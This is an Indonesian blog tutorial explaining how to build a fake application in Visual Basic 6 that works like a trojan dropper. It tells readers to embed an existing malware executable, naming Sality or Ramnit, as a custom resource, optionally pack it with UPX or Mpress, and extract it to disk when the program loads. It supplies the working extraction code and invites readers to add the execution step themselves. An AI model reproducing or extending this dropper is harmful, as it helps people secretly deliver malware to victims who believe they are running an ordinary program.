Headline News:
Home » , , » Membuat Fake Application

Membuat Fake Application

Pada tutorial ini, saya ingin memberi contoh Fake Application yang melakukan aksi Drop File Executable, seperti beberapa tipe Trojan yang jika dijalankan terlihat seperti program biasa tetapi secara diam-diam melakukan ekstrak [drop] file lainnya kemudian file hasil ekstrak di eksekusi untuk menjalankan aksinya .


Oke, langsung pada cara pembuatan:
  1.  buka Microsoft Visual Basic 6 anda, buat project baru dengan tipe standar EXE, kemudian buat 1 form baru.
  2. Pilih Menu Tools – Resource Editor, lalu klik icon Add Custom Resource


3. Pilih file executable yang anda inginkan misalnya Sality atau Ramnit juga boleh. 
4. Kemudian Open, file yang akan dibuat menjadi resource file ber-ekstensi .RES, sehingga bisa disimpan ke dalam program. File executable bisa anda pack dahulu dengan UPX, Mpress dan sebagainya agar ukuran file menjadi lebih kecil.
Ketika akan menyimpan resource ,beri nama sesuai keinginan anda misalnya project1.RES

5. Setelah sukses “melampirkan” malware atau program lain kedalam program utama, maka ketik kode berikut pada form :


  • ’membuat fungsi KeluarkanFile untuk ekstrak file
  • Private Function KeluarkanFile(JenisRes As String, IDRes As Long, OFile As String)
  • Dim DROP() As Byte
  • DROP = LoadResData(IDRes, JenisRes)
  • Open OFile For Binary As #1
  • Put #1, , DROP
  • Close #1
  • End Function
  • ‘fungsi ini akan dipanggil ketika program diload ke memori
  • Private Sub Form_Load()
  • ‘fungsi keluarkanfile dipanggil saat program dieksekusi,ganti nama hehe.exe sesuai keinginan anda
  • KeluarkanFile “CUSTOM”, 101, App.Path & “\Gokil.exe”
  • Msgbox “File berhasil di ekstrak”,vbinformation,”Info”
  • End Sub


6. Save project kemudian run saja, maka akan muncul  file bernama Gokil.exe di direktori yang sama dengan project anda berada.

Catatan: program tidak langsung menjalankan file hasil ekstrak, silahkan tambahkan sendiri kodenya.
Share this article :
Comments
0 Comments

Tidak ada komentar:

Posting Komentar

 
this is RYB ART | Site Meter
Copyright © 2012. RIZKY YANDA BAHRI ART COM - All Rights Reserved